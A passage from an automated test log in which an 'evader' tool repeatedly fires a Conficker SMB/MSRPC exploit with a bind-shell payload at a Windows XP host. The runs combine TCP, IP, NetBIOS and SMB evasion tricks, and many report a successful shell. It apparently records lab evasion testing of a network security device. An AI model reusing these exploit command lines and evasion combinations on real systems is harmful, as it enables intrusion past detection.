- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 159953442> and has shuffled original payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 50% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
- Info: NetBIOS connection 10.62.90.115:19812 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .Pid 487 timed out - killed
- 2015-06-08 00:00:47 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49214 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=YuEkRjb1/QI --evasion=[msrpc_req,end]smb_fnameobf,"add_null_trailer" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed YuEkRjb1/QJ
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a random alphanumeric urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - The SMB filename is obfuscated:
- * A 0x00 and random alphanumeric characters are appended to the filename
- Info: NetBIOS connection 10.62.90.112:49214 -> 10.35.1.207:445
- Terminated
- 4768 runs averaging 1.92 runs / second ; progress: 2479/43200......................
- 4790 runs averaging 1.93 runs / second ; progress: 2484/43200.......2015-06-08 00:00:57 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33279 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=/95Xlpf3RsE --evasion=[smb_connect,msrpc_req]tcp_paws,"1","221380699","alphanumrandomized" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"3","225560803","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed /95Xlpf3RsH
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 221380699> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 225560803> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.119:33279 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 4804 runs averaging 1.93 runs / second ; progress: 2489/43200..2015-06-08 00:01:00 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31556 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=6iwHnnxwOcY --evasion=[smb_openpipe,end]netbios_chaff,"75%","empty_unspec|empty_keepalive|http_get|broken_length" --evasion=[msrpc_req,end]tcp_paws,"1","268435454","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed 6iwHnnxwOcb
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage msrpc_req to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.119:31556 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 4813 runs averaging 1.93 runs / second ; progress: 2494/43200.........
- 4822 runs averaging 1.93 runs / second ; progress: 2499/43200........
- 4830 runs averaging 1.93 runs / second ; progress: 2505/43200..................
- 4848 runs averaging 1.93 runs / second ; progress: 2510/43200.........2015-06-08 00:01:22 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55302 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=NCio3MEwTEg --evasion=[smb_connect,msrpc_req]netbios_chaff,"21","empty_unspec|http_get|http_post|msrpc_req|broken_length" --evasion=[msrpc_req,end]tcp_paws,"75%","268435453","random" --verifydelay=1000 --payload=shell
- Info: Using random seed NCio3MEwTEg
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before every 21th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage msrpc_req to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.112:55302 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ......2015-06-08 00:01:24 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26322 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=QWx1nZIe9+M --evasion=[smb_connect,end]tcp_paws,"75%","72312509","alpharandomized" --evasion=[smb_connect,msrpc_req]tcp_segvar,"8","65535" --verifydelay=1000 --payload=shell
- Info: Using random seed QWx1nZIe9+N
- The following evasions are applied from stage smb_connect to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 72312509> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_connect to msrpc_req:
- - TCP packets are segmented to contain between 8 and 65535 bytes of payload.
- Info: NetBIOS connection 10.62.90.113:26322 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 4868 runs averaging 1.94 runs / second ; progress: 2515/43200........................................
- 4908 runs averaging 1.95 runs / second ; progress: 2520/43200.....
- 4913 runs averaging 1.95 runs / second ; progress: 2525/43200...
- 4916 runs averaging 1.94 runs / second ; progress: 2530/43200Pid 1602 timed out - killed
- 2015-06-08 00:01:40 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34158 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=Od53aWgCGO8 --evasion=[smb_openpipe,end]smb_decoytrees,"4","1","3","random_alphanum" --evasion=[smb_connect,end]tcp_urgent,"8","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed Od53aWgCGO8
- The following evasions are applied from stage smb_connect to end:
- - Add a random alphaurgent data byte to every 8 TCP segment.
- The following evasions are applied from stage smb_openpipe to end:
- - Before normal SMB writes, 4 SMB trees are opened and 1 writes are performed to them. The write payload is 3 random alphanumeric bytes.
- Info: NetBIOS connection 10.62.90.111:34158 -> 10.35.1.207:445
- Terminated
- ......
- 4923 runs averaging 1.94 runs / second ; progress: 2535/43200................
- 4939 runs averaging 1.94 runs / second ; progress: 2540/43200..................
- 4957 runs averaging 1.95 runs / second ; progress: 2545/43200..........2015-06-08 00:01:57 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56910 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=h1E0rUeQUeg --evasion=[msrpc_bind,end]smb_fnameobf,"change_case|add_paths" --evasion=[start,end]tcp_paws,"75%","6","random_alpha" --evasion=[netbios_connect,msrpc_req]tcp_paws,"21","268435455","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed h1E0rUeQUei
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has random alpha bytes as payload
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has shuffled original payload
- The following evasions are applied from stage msrpc_bind to end:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- * Dummy paths are added ( a/b -> a/c/../b )
- Info: NetBIOS connection 10.62.90.115:56910 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 4979 runs averaging 1.95 runs / second ; progress: 2550/43200.................
- 4996 runs averaging 1.96 runs / second ; progress: 2555/43200.........
- 5005 runs averaging 1.96 runs / second ; progress: 2560/43200...............
- 5020 runs averaging 1.96 runs / second ; progress: 2565/43200.......Pid 2406 timed out - killed
- 2015-06-08 00:02:17 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40290 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=AhYHSBXWoXo --evasion=[start,msrpc_bind]tcp_paws,"8","54291791","shuffle30" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
- Info: Using random seed AhYHSBXWoXo
- The following evasions are applied from stage start to msrpc_bind:
- - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 54291791> and has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.117:40290 -> 10.35.1.207:445
- Terminated
- .........
- 5037 runs averaging 1.96 runs / second ; progress: 2570/43200........
- 5045 runs averaging 1.96 runs / second ; progress: 2575/43200......
- 5051 runs averaging 1.96 runs / second ; progress: 2580/43200...............
- 5066 runs averaging 1.96 runs / second ; progress: 2585/43200.............
- 5079 runs averaging 1.96 runs / second ; progress: 2590/43200.....
- 5084 runs averaging 1.96 runs / second ; progress: 2595/43200.....
- 5089 runs averaging 1.96 runs / second ; progress: 2600/43200...............
- 5104 runs averaging 1.96 runs / second ; progress: 2605/43200...........
- 5115 runs averaging 1.96 runs / second ; progress: 2610/43200.............2015-06-08 00:03:05 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59465 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=3DS3pyOHWq0 --evasion=[start,msrpc_bind]tcp_chaff,"21","chksum|shorthdr","shuffle" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"75%","268435455","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 3DS3pyOHWq3
- The following evasions are applied from stage start to msrpc_bind:
- - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * TCP header shorter than 20 bytes
- * Duplicate packet has shuffled original payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.115:59465 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 5129 runs averaging 1.96 runs / second ; progress: 2615/43200.......
- 5136 runs averaging 1.96 runs / second ; progress: 2620/43200...
- 5139 runs averaging 1.96 runs / second ; progress: 2625/43200
- 5139 runs averaging 1.95 runs / second ; progress: 2630/43200....
- 5143 runs averaging 1.95 runs / second ; progress: 2635/43200......
- 5149 runs averaging 1.95 runs / second ; progress: 2640/43200....
- 5153 runs averaging 1.95 runs / second ; progress: 2645/43200.......
- 5160 runs averaging 1.95 runs / second ; progress: 2650/43200......
- 5166 runs averaging 1.95 runs / second ; progress: 2655/43200.....
- 5171 runs averaging 1.94 runs / second ; progress: 2660/43200...2015-06-08 00:03:53 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=27679 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=QkY39pBKwKw --evasion=[netbios_connect,end]tcp_paws,"1","121655769","random" --evasion=[smb_openpipe,msrpc_req]tcp_segvar,"43643","65533" --verifydelay=1000 --payload=shell
- Info: Using random seed QkY39pBKwKx
- The following evasions are applied from stage netbios_connect to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 121655769> and has random bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - TCP packets are segmented to contain between 43643 and 65533 bytes of payload.
- Info: NetBIOS connection 10.62.90.117:27679 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .........
- 5184 runs averaging 1.94 runs / second ; progress: 2665/43200......
- 5190 runs averaging 1.94 runs / second ; progress: 2670/43200.......
- 5197 runs averaging 1.94 runs / second ; progress: 2675/43200..........
- 5207 runs averaging 1.94 runs / second ; progress: 2680/43200.......
- 5214 runs averaging 1.94 runs / second ; progress: 2686/43200...........
- 5225 runs averaging 1.94 runs / second ; progress: 2691/43200.........
- 5234 runs averaging 1.94 runs / second ; progress: 2696/43200..........2015-06-08 00:04:30 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38914 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=lPX1ueb1MCY --evasion=[msrpc_bind,end]tcp_paws,"75%","8","shuffle" --evasion=[smb_connect,msrpc_bind]tcp_segvar,"65533","65534" --verifydelay=1000 --payload=shell
- Info: Using random seed lPX1ueb1MCa
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - TCP packets are segmented to contain between 65533 and 65534 bytes of payload.
- The following evasions are applied from stage msrpc_bind to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.111:38914 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 5245 runs averaging 1.94 runs / second ; progress: 2701/43200.........Pid 4779 timed out - killed
- 2015-06-08 00:04:34 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31057 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=66asV1b53WY --evasion=[netbios_connect,msrpc_bind]ipv4_opt,"5","inc","zero" --evasion=[smb_connect,smb_openpipe]ipv4_opt,"2","inc","unmodified" --evasion=[netbios_connect,end]tcp_paws,"2","3","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed 66asV1b53Wb
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - Every 5th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has NULL bytes for payload
- The following evasions are applied from stage netbios_connect to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has 0x00 bytes as payload
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload
- Info: NetBIOS connection 10.62.90.116:31057 -> 10.35.1.207:445
- Terminated
- .......
- 5262 runs averaging 1.94 runs / second ; progress: 2706/43200................
- 5278 runs averaging 1.95 runs / second ; progress: 2711/43200...........
- 5289 runs averaging 1.95 runs / second ; progress: 2716/43200......
- 5295 runs averaging 1.95 runs / second ; progress: 2721/43200............
- 5307 runs averaging 1.95 runs / second ; progress: 2726/43200.............
- 5320 runs averaging 1.95 runs / second ; progress: 2731/43200...................
- 5339 runs averaging 1.95 runs / second ; progress: 2736/43200...............
- 5354 runs averaging 1.95 runs / second ; progress: 2741/43200Pid 5432 timed out - killed
- 2015-06-08 00:05:11 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38134 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=IXFVjUV0NBU --evasion=[start,smb_opentree]tcp_chaff,"2","nullflag|outofwindow|longhdr","shuffle30" --evasion=[smb_openpipe,end]tcp_paws,"1","2","random_alpha" --evasion=[netbios_connect,msrpc_bind]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed IXFVjUV0NBU
- The following evasions are applied from stage start to smb_opentree:
- - With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header longer than packet total size
- * Duplicate packet has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_openpipe to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.118:38134 -> 10.35.1.207:445
- Terminated
- ........
- 5363 runs averaging 1.95 runs / second ; progress: 2746/43200.....
- 5368 runs averaging 1.95 runs / second ; progress: 2751/43200.........
- 5377 runs averaging 1.95 runs / second ; progress: 2756/43200........Pid 5835 timed out - killed
- 2015-06-08 00:05:28 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60575 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=gdbOuPqrGXQ --evasion=[msrpc_req,end]smb_decoytrees,"1","6","2","zero" --evasion=[msrpc_req,end]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed gdbOuPqrGXS
- The following evasions are applied from stage msrpc_req to end:
- - Add a random alphanumeric urgent data byte to every 2 TCP segment.
- - Before normal SMB writes, 1 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of zeroes.
- Info: NetBIOS connection 10.62.90.114:60575 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Terminated
- ..............
- 5400 runs averaging 1.96 runs / second ; progress: 2761/43200.................
- 5417 runs averaging 1.96 runs / second ; progress: 2766/43200..........2015-06-08 00:05:39 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33189 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=L4awF43Jyu8 --evasion=[netbios_connect,smb_opentree]tcp_chaff,"2","nullflag|outofwindow|shorthdr|longhdr","alphanumrandomized" --evasion=[msrpc_bind,end]tcp_paws,"1","268435453","random" --verifydelay=1000 --payload=shell
- Info: Using random seed L4awF43Jyu8
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.117:33189 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 5433 runs averaging 1.96 runs / second ; progress: 2771/43200...Pid 6275 timed out - killed
- .2015-06-08 00:05:44 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18545 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=9j13UKNIujo --evasion=[smb_connect,smb_openpipe]tcp_tsoptreply,"le" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed 9j13UKNIujr
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 25% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.110:18545 -> 10.35.1.207:445
- Terminated
- ....
- 5442 runs averaging 1.96 runs / second ; progress: 2776/43200............
- 5454 runs averaging 1.96 runs / second ; progress: 2781/43200..............................
- 5484 runs averaging 1.97 runs / second ; progress: 2786/43200......2015-06-08 00:05:57 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38094 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=Ob4ff1j+QiM --evasion=[msrpc_req,end]netbios_chaff,"13","empty_unspec|http_post|broken_length" --evasion=[smb_connect,msrpc_req]tcp_paws,"1","268435455","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed Ob4ff1j+QiM
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage msrpc_req to end:
- - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.117:38094 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .........2015-06-08 00:05:59 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41416 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=W6ooJoo6NGg --evasion=[smb_opentree,msrpc_bind]smb_chaff,"3","write_flag","rand" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","4","shuffle30" --verifydelay=1000 --payload=shell
- Info: Using random seed W6ooJoo6NGh
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Before every 3th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has 30 bytes of original payload, then shuffled original payload
- Info: NetBIOS connection 10.62.90.119:41416 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........2015-06-08 00:06:01 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37607 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=dEFeq3VZExs --evasion=[smb_connect,msrpc_bind]ipv4_frag,"1480" --evasion=[smb_openpipe,end]tcp_paws,"75%","86788071","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed dEFeq3VZExt
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - IPv4 fragments with at most 1480 bytes per fragment
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 86788071> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.116:37607 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 5518 runs averaging 1.98 runs / second ; progress: 2791/43200..2015-06-08 00:06:02 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59212 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=KcAUp61efmk --evasion=[smb_opentree,end]tcp_chaff,"25%","longhdr","alphanumrandomized" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","9","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed KcAUp61efmk
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_opentree to end:
- - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * TCP header longer than packet total size
- * Duplicate packet has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.116:59212 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ...........................
- 5548 runs averaging 1.98 runs / second ; progress: 2796/43200...........
- 5559 runs averaging 1.98 runs / second ; progress: 2802/43200..............
- 5573 runs averaging 1.99 runs / second ; progress: 2807/43200.2015-06-08 00:06:17 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16184 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=hDX3Ay+q5YA --evasion=[start,msrpc_req]tcp_chaff,"25%","chksum|nullflag|shorthdr","shuffle30" --evasion=[smb_openpipe,end]tcp_paws,"25%","133338995","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed hDX3Ay+q5YC
- The following evasions are applied from stage start to msrpc_req:
- - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * Duplicate packet has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage smb_openpipe to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 133338995> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.118:16184 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..............
- 5589 runs averaging 1.99 runs / second ; progress: 2812/43200..................
